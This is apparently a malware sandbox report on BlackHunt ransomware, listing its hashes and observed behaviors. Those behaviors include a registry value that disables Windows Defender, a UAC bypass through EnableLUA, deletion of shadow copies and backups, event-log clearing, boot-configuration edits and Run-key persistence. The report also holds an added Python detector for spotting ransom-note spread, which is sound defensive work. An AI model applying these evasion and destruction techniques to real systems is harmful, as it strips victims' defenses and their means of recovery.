SHA512 5d89c38896f51b2e05f3f0a209054cefe770823b929f4ed9c1275df9aaef58b44dae482a3483c295098423a0652672774797ab869dc67967b31af3dfdb151583

C:\ProgramData\#BlackHunt_ReadMe.txt

MD5 88d5b995bf93732281a24ffa8c40ab5c
SHA1 ed0d8cb268e450141673338e131ff2bd97f8b23c
SHA256 69ffdd2db3a73f5a41ba2d4b25d27661112a80f2d403112b11f53454ad5fb5c1
SHA512 ea7a88abc7583e6e50d08b8711fd93bf4d79137e68922c614c9e3ed47fdc0bfae113acd6693ffdbf24dd8c966e667ccee9bb3d958ef28fcbb4aceb9db3ef071e

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-06 00:48

Reported

2024-11-06 00:50

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe"

Signatures

Deletes NTFS Change Journal

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\fsutil.exe N/A
N/A N/A C:\Windows\system32\fsutil.exe N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\system32\reg.exe N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Clears Windows event logs

evasion ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (3360) files with added filename extension

ransomware

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Disables Task Manager via registry modification

evasion

Disables use of System Restore points

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Windows\System32\cmd.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" C:\Windows\system32\reg.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\fsutil.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\fsutil.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\java.security C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\root\ui-strings.js C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\bun.png C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\he-il\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\pl-pl\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\ja-jp\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\fi-fi\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_it_135x40.svg C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-il\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-il\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\da-dk\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\css\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-ae\ui-strings.js C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ca-es\ui-strings.js C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nb-no\ui-strings.js C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ca-es\ui-strings.js C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-ae\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\th_get.svg C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ja-jp\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\de-de\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\mai\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\he-il\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ko-kr\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files-select\css\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\home-view\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ro-ro\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\en_US\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\SendMail.api C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\es-es\ui-strings.js C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\nb-no\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ko-kr\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\ka\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\mr\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\pt-br\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\it-it\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\gu.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\Java\jdk-1.8\jre\bin\server\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_reportabuse-default_18.svg C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account-select\js\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\s_listview_18.svg C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sl-si\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\zh-tw\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ar_get.svg C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\dotnet\host\fxr\7.0.16\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\currency.data C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\fy\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fi-fi\ui-strings.js C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ro-ro\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ui-strings.js C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\css\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\cs-cz\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-high-contrast.css C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\example_icons.png C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\root\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fr-ma\ui-strings.js C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
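The rows above repeat two patterns that ordinary software never produces: the same note and key file names (#BlackHunt_ReadMe.txt, #BlackHunt_ReadMe.hta, #BlackHunt_Private.key) written into one directory after another, and files belonging to unrelated products (Adobe, VideoLAN, 7-Zip, Java) opened for modification by a single process. As an added example that is not part of this report or of the sandbox's own tooling, the Python below parses rows in the layout this report uses and raises both signals: note fan-out (one process creating an identical basename in many directories) and mass modification (one process touching several unrelated Program Files roots). The sample rows are constructed from this report's table plus two invented benign 7-Zip rows; the thresholds, and the assumption that the process image is the last drive-rooted .exe before "N/A", are mine.

```python
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# One report row: "<op> <target path> <process image> N/A". Both paths may contain spaces,
# so the split relies on the process image being the last drive-rooted ".exe" before "N/A"
# (an assumption about this report's layout, not a documented format).
ROW = re.compile(
    r'^(File created|File opened for modification)\s+(.+?)\s+([A-Za-z]:\\.+?\.exe)\s+N/A$',
    re.I,
)


def parse_rows(text):
    """Yield (op, target PureWindowsPath, process image) for every row matching the layout."""
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            yield m.group(1).lower(), PureWindowsPath(m.group(2)), m.group(3)


def fan_out(rows, min_dirs=3):
    """Per process, count the distinct directories each *created* basename lands in.
    Returns {process: {basename: sorted directories}} for basenames at or over min_dirs."""
    seen = defaultdict(lambda: defaultdict(set))
    for op, target, proc in rows:
        if op == "file created":
            seen[proc][target.name].add(str(target.parent))
    return {
        proc: {name: sorted(dirs) for name, dirs in names.items() if len(dirs) >= min_dirs}
        for proc, names in seen.items()
        if any(len(dirs) >= min_dirs for dirs in names.values())
    }


def mass_modification(rows, min_roots=3):
    """Per process, count distinct application roots (Program Files[ (x86)]\\<vendor>) whose
    files it opened for modification. Returns {process: sorted roots} at or over min_roots."""
    roots = defaultdict(set)
    for op, target, proc in rows:
        if op != "file opened for modification":
            continue
        parts = target.parts  # e.g. ('C:\\', 'Program Files', 'VideoLAN', 'VLC', ...)
        if len(parts) > 2 and parts[1].lower().startswith("program files"):
            roots[proc].add("\\".join(parts[1:3]))
    return {proc: sorted(r) for proc, r in roots.items() if len(r) >= min_roots}


# Constructed sample: rows copied from this report's Files table, plus two invented benign
# rows for 7-Zip's own file manager rewriting one of its language files.
SAMPLE_REPORT = r"""
File created C:\Program Files\VideoLAN\VLC\locale\ka\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\mr\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\Java\jdk-1.8\jre\bin\server\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\dotnet\host\fxr\7.0.16\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\fy\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\css\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sl-si\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\gu.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\currency.data C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-high-contrast.css C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\7-Zip\Lang\gu.txt C:\Program Files\7-Zip\7zFM.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\gu.txt C:\Program Files\7-Zip\7zFM.exe N/A
"""

if __name__ == "__main__":
    rows = list(parse_rows(SAMPLE_REPORT))
    for proc, names in fan_out(rows).items():
        for name, dirs in names.items():
            print(f"fan-out: {proc} wrote {name} into {len(dirs)} directories")
    for proc, roots in mass_modification(rows).items():
        print(f"mass modification: {proc} touched {roots}")
```

The thresholds are deliberately low for a short excerpt; on full EDR telemetry raise min_dirs into the hundreds and feed only create events for names that appear in no software inventory, otherwise installers and update agents will trip the fan-out rule.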

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\mshta.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\System32\vds.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings C:\Windows\System32\cmd.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ C:\Windows\system32\reg.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
